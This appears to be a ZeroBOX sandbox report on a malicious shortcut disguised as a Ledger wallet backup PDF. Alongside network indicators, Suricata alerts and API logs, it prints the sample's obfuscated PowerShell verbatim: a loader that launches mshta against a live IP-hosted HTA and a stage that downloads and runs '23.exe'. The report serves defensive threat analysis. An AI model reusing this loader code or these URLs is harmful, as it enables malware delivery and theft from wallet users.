popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Ledger Backup Guide.pdf.lnk

Generic Malware Admin Tool (Sysinternals etc ...) Antivirus UPX GIF Format AntiDebug Lnk Format PE32 PE File AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 31, 2024, 2:42 p.m. July 31, 2024, 2:44 p.m.
Size 3.1KB
Type MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 2f7d198bd913d4694467e2ded0e55ead
SHA256 d835b3b8ebac5b8d51fc54ec1a640140abbb132f20afb13d6125ab5cdf92e029
CRC32 15D3D5ED
ssdeep 48:8c5abYx09PL1L89RN8ZNSDt+hjtWT2jvTcMdJ9Aa5:8c5Xx09PL1L8+AGjt7jQAqQ
Yara
  • Antivirus - Contains references to security software
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "YOJrRVJtLJap" "C:\Users\test22\AppData\Local\Temp\Ledger Backup Guide.pdf.lnk"

    2560

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t'; &(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)])); ~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)])); foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]}; ^[ $O;

      2672

      • mshta.exe "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta

        2808

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;

          2948

Name Response Post-Analysis Lookup
www.mediafire.com
A 104.16.114.74
A 104.16.113.74
104.16.114.74
poslisoubor.cz
A 109.71.208.62
109.71.208.62
download2268.mediafire.com
A 199.91.155.9
199.91.155.9
IP Address Status Action
104.16.114.74 Active Moloch
109.71.208.62 Active Moloch
164.124.101.2 Active Moloch
199.91.155.9 Active Moloch
41.216.183.3 Active Moloch
94.154.172.166 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2043259 ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 104.16.114.74:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 94.154.172.166:80 2022482 ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 94.154.172.166:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2400002 ET DROP Spamhaus DROP Listed Traffic Inbound group 3 Misc Attack
TCP 192.168.56.101:49177 -> 41.216.183.3:56001 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 41.216.183.3:56001 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 41.216.183.3:56001 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 199.91.155.9:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49171 -> 199.91.155.9:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 94.154.172.166:80 2022520 ET POLICY Possible HTA Application Download Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 94.154.172.166:80 2027261 ET INFO Dotted Quad Host HTA Request Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 94.154.172.166:80 2024449 ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl Attempted User Privilege Gain
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 41.216.183.3:56001 -> 192.168.56.101:49177 2035595 ET MALWARE Generic AsyncRAT Style SSL Cert Domain Observed Used for C2 Detected
TCP 94.154.172.166:80 -> 192.168.56.101:49166 2024197 ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) A Network Trojan was detected
UDP 192.168.56.101:54148 -> 164.124.101.2:53 2036936 ET HUNTING File Sharing Related Domain in DNS Lookup (download .mediafire .com) Potentially Bad Traffic
TCP 94.154.172.166:80 -> 192.168.56.101:49166 2044909 ET MALWARE VBS/TrojanDownloader.Agent.XAO Payload Inbound A Network Trojan was detected
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2021954 ET MALWARE JS/Nemucod.M.gen downloading EXE payload A Network Trojan was detected
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 94.154.172.166:80 -> 192.168.56.101:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49169
104.16.114.74:443 		C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA C=US, ST=Texas, O=MEDIAFIRE, LLC, CN=*.mediafire.com 8b:fa:81:04:17:18:84:c4:3e:8e:d5:89:ad:d6:5d:bd:9a:df:84:da
TLSv1
192.168.56.101:49177
41.216.183.3:56001 		CN=Rlofxutfz CN=Rlofxutfz 58:60:84:11:c2:61:e1:a9:6f:bb:95:ea:4a:07:95:10:c4:6f:7f:4f

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:491
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDR
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: Ggw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: 095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,2109
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: 5,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLt
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: IzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,2108
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: 8,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.Serv
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: icePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$M
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: UUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp(
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: $Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[ch
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: ar]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:A
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: PPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,2104
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: 34,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjh
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: d;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,2104
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: 21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $q
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: XEYnMFd;;;}WVzMbSyaK;
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: At line:1 char:577
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: + function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDR
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: Ggw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: 095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,2109
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: 5,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLt
console_handle: 0x000001db
1 1 0

WriteConsoleW

 buffer: IzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,2108
console_handle: 0x000001e7
1 1 0

WriteConsoleW

 buffer: 8,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.Serv
console_handle: 0x000001f3
1 1 0

WriteConsoleW

 buffer: icePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGg
console_handle: 0x000001ff
1 1 0

WriteConsoleW

 buffer: w = $OKwmuBS.DownloadData <<<< ($HftxTOL);return $MUUDRGgw};function hSqAuyRUp(
console_handle: 0x0000020b
1 1 0

WriteConsoleW

 buffer: $Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[ch
console_handle: 0x00000217
1 1 0

WriteConsoleW

 buffer: ar]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:A
console_handle: 0x00000223
1 1 0

WriteConsoleW

 buffer: PPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,2104
console_handle: 0x0000022f
1 1 0

WriteConsoleW

 buffer: 34,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjh
console_handle: 0x00000277
1 1 0

WriteConsoleW

 buffer: d;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,2104
console_handle: 0x00000283
1 1 0

WriteConsoleW

 buffer: 21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $q
console_handle: 0x000002a7
1 1 0

WriteConsoleW

 buffer: XEYnMFd;;;}WVzMbSyaK;
console_handle: 0x000002b3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000002bf
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000002cb
1 1 0

WriteConsoleW

 buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: At line:1 char:61
console_handle: 0x00000033
1 1 0

WriteConsoleW

 buffer: + function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes <<<< ($aGLtIzJ,
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: 087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,2108
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: 7,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(2106
console_handle: 0x0000006f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567fb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567fb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567fb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567fb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567fb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567fb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005685b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00568330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005682f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00567cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005f8628
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005f8ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005f8ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005f8ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005f8da8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://94.154.172.166/rwrv/3007f.hta
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://94.154.172.166/rwrv/23.exe
suspicious_features GET method with no useragent header suspicious_request GET https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file
request GET http://94.154.172.166/rwrv/3007f.hta
request GET http://94.154.172.166/rwrv/23.exe
request GET http://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt
request GET https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0280a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0285b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
